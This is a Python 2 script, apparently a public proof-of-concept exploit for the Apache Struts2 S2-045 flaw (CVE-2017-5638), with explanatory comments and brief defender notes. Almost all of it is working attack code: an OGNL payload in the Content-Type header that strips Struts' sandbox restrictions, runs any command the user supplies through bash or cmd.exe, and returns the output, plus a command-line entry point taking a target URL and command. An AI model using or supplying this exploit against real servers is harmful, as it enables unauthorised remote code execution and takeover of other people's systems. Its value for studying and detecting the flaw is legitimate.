
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib
def exploit(url, cmd):
    """Send one request to ``url`` carrying an OGNL expression in the Content-Type header and return the response body.

    This is the public proof-of-concept the ``__main__`` block labels as
    CVE-2017-5638 (Apache Struts2 S2-045). The only unusual thing about the
    request is its Content-Type header: its value is the OGNL expression
    built below, and the Struts versions listed on this page as affected
    (2.3.5 through 2.3.31, 2.5 through 2.5.10) evaluate it server-side.
    The expression runs ``cmd`` via ``java.lang.ProcessBuilder`` and copies
    the process output into the servlet response, so the HTTP body that
    comes back is the command output.

    Parameters:
        url: target URL; passed to urllib2.Request unchanged.
        cmd: command string; spliced verbatim into the OGNL expression
             with no quoting or escaping.

    Returns:
        The response body as read by urllib2, or the partial body when the
        server closes the connection early (httplib.IncompleteRead). The
        body is also printed before it is returned.

    Raises:
        Anything else urllib2.urlopen raises (e.g. URLError, HTTPError)
        propagates unchanged.

    Defender notes: a legitimate client never sends a Content-Type that
    starts with ``%{`` or mentions ``#_memberAccess`` / ``ognl.OgnlContext``;
    that header value is the detection indicator for this request, and the
    fix is upgrading Struts out of the affected range above. The script is
    Python 2 only (``urllib2``, ``httplib``, ``except X, e`` syntax).
    """
    # '%{' opens an OGNL expression; everything up to the closing '}' is
    # one expression whose sub-expressions are chained with '.'.
    payload = "%{(#_='multipart/form-data')."
    # Sandbox removal: replace the context's member-access policy with
    # DEFAULT_MEMBER_ACCESS, then empty OgnlUtil's excluded package and
    # class lists so the class references further down are not blocked.
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    # The caller's command is inserted raw via %-formatting (see docstring).
    payload += "(#cmd='%s')." % cmd
    # Choose the interpreter from os.name: cmd.exe /c on Windows,
    # /bin/bash -c everywhere else.
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    # Start the process with stderr merged into stdout so both streams
    # end up in the response.
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    # Copy the process output straight into the servlet response stream;
    # this is what makes the command output readable as the HTTP body.
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"

    try:
        # The expression travels as the Content-Type header value; the
        # request has no body. No timeout is set on urlopen.
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = urllib2.Request(url, headers=headers)
        page = urllib2.urlopen(request).read()
    # Python 2 'except X, e' form. The server may drop the connection
    # before the body is complete; keep whatever was received.
    except httplib.IncompleteRead, e:
        page = e.partial

    print(page)
    return page
if __name__ == '__main__':
    # Script entry point: exactly two positional arguments, the target URL
    # and the command string handed to exploit().
    import sys

    if len(sys.argv) != 3:
        print("[*] struts2_S2-045.py <url> <cmd>")
    else:
        print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
        url = sys.argv[1]
        cmd = sys.argv[2]
        print("[*] cmd: %s\n" % cmd)
        # exploit() prints the response body itself; its return value is
        # discarded here.
        exploit(url, cmd)